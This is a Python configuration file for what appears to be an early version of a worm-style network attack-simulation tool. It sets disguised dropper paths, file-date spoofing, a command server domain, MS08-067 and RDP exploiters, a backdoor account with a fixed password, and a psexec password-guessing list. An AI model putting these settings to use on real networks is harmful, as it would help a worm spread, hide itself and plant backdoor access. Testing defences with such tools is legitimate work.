monkey/chaos_monkey/config.py

83 lines
2.2 KiB
Python
Raw Normal View History

2015-08-30 15:27:35 +08:00
import os
import sys
import ntpath
from network.range import ClassCRange, RelativeRange, FixedRange
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter
2015-08-30 15:27:35 +08:00
from network import TcpScanner, PingScanner
__author__ = 'itamar'
class WormConfiguration(object):
###########################
### logging config
###########################
use_file_logging = True
dropper_log_path = os.path.expandvars("%temp%\~df1562.tmp")
monkey_log_path = os.path.expandvars("%temp%\~df1563.tmp")
###########################
### dropper config
###########################
dropper_try_move_first = sys.argv[0].endswith(".exe")
dropper_set_date = True
dropper_date_reference_path = r"\windows\system32\kernel32.dll"
dropper_target_path = ntpath.join(r"C:\Windows", ntpath.split(sys.argv[0])[-1])
###########################
### monkey config
###########################
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
# how long to wait between scan iterations
timeout_between_iterations = 10
# how many scan iterations to perform on each run
max_iterations = 2
scanner_class = TcpScanner
exploiter_classes = (RdpExploiter, )
2015-08-30 15:27:35 +08:00
# how many victims to look for in a single scan iteration
victims_max_find = 14
# how many victims to exploit before stopping
victims_max_exploit = 7
command_server = "russian-mail-brides.com"
###########################
### scanners config
###########################
#range_class = RelativeRange
#range_size = 8
range_class = FixedRange
range_fixed = ("10.15.1.94", )
2015-08-30 15:27:35 +08:00
# TCP Scanner
tcp_target_ports = [445, 135]
tcp_scan_timeout = 1000 # 1000 Milliseconds
tcp_scan_interval = 200
# Ping Scanner
ping_scan_timeout = 1000
###########################
### exploiters config
###########################
skip_exploit_if_file_exist = True
ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!"
# psexec exploiter
psexec_user = "Administrator"
psexec_passwords = ["Password1!", "1234", "password", "password", "12345678"]